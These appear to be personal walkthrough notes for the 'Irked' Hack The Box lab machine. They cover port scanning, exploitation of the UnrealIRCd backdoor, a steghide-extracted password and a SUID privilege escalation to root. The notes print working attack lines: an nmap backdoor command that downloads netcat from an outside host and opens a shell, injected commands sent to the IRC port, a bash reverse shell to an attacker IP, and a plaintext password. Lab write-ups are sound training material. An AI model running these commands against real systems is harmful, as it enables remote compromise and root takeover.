Irked No.20 10.129.1.108

Nmap Scan Result:
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp  open  http    Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          33327/tcp6  status
|   100024  1          43906/udp   status
|   100024  1          51247/tcp   status
|_  100024  1          56232/udp6  status
​
port 80 Enum: 
manual 
apache 2.4.10
Dead end here for now...
I'll do one more dir busting with gobuster 
​
---
Full nmap scanning shows there's port 8067 
​
it's looking up the host name?
IRCNow | Netcat / Troubleshooting with netcat
​
Unreal3.2.8.1
​https://www.infosecmatter.com/nmap-nse-library/?nse=irc-unrealircd-backdoor​
nmap -d -p6667 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor.command='wget http://www.javaop.com/~ron/tmp/nc && chmod +x ./nc && ./nc -l -p 4444 -e /bin/sh' 10.129.1.108 
echo "AB; ping -c 192.168.49.130" | nc 192.168.130.120 8067 
tcpdump -i tun1 icmp -v 
comfirmed that we can do command execution
echo "AB; bash -c 'bash -i >& /dev/tcp/192.168.49.130/9001 0>&1'" | nc 192.168.130.120 8067
​
​
Explanation: Sometimes, linux may not be in the bash mode, so we told the engine to go to the bash mode with "bash -c" before executing the command" 
got a reverse shell:
found a djmardov directory. 
do find . -ls -type f
shows only files in the current directory. 
back up file. 
​
​
UPupDOWNdownLRlrBAbaSSss
Steg---steganography..
​
We only saw one picture, which was this img. 
Extracting password from an img file with steghide 
steghide extract -sf Desktop/irked.jpg -p UPupDOWNdownLRlrBAbaSSss 
Kab6h+m+bbp2J:HG
I was able to ssh into the user with the pass found. 
LinEnum.sh 
wget -r http://10.10.16.13/LinEnum.sh > LinEnum.sh
./LinEnum.sh
​
Ran LinPeas.sh 
Now let's transfer the file over to kali and analyze it. 
1.base64 -w0 /usr/bin/viewuser  this will encode the file into base64. -w0 eliminates line wrapping.
2.base64 textfile.txt --decode
3.use "ltrace" to analyze it. 
executing /tmp/listusers 
if we replace this file with a shell, we can get a root. 
replaced the content with 👍
​
#!/bin/bash
/bin/bash
​
​
ran the viewuser app 
Now we are in root
​
HTB Netmon #21 (Windows)
HTB Write-Up Jerry Windows
Last modified 1yr ago